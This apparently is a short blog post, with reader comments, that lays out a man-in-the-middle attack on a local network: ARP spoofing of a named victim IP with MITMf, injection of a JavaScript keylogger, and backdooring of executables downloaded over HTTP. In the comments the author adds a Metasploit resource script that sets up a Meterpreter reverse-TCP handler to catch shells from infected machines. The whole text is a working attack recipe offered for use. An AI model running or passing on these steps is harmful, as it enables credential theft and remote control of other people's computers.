Msfconsole + MIMTF Inject Backdoor executables sent over HTTP
INTERFACE = eth0
GATEWAY = IP ROUTE
VICTIM = 192.168.1.4
# netdiscover -i eth0
# /etc/init.d/postgresql start
# msfconsole -r msf-rc/windows_msf_reverse_tcp.rc
# msfconsole -q
msf > load msgrpc
# apt-get install mitmf
# gedit /usr/share/mitmf/config/mitmf.conf
find [[Metasploit]]
find [[[[WindowsIntelx86]]]]
# mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.4 --jskeylogger --filepwn
INTERFACE = eth0
GATEWAY = IP ROUTE
VICTIM = 192.168.1.4
# netdiscover -i eth0
# /etc/init.d/postgresql start
# msfconsole -r msf-rc/windows_msf_reverse_tcp.rc
# msfconsole -q
msf > load msgrpc
# apt-get install mitmf
# gedit /usr/share/mitmf/config/mitmf.conf
find [[Metasploit]]
find [[[[WindowsIntelx86]]]]
# mitmf -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.4 --jskeylogger --filepwn
i got error here
ResponderExcluir[-] Cannot find resource script: msf-rc/windo
ws_msf_reverse_tcp.rc
excuse for not having answered you, google not warn me about comments
Excluirwindows_msf_reverse_tcp.rc is my resource file
you can create your according to your configurations
usage:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT YPUR_PORT
set EXITFUNC thread
set ExitOnSession false
exploit -j -z
save in file .rc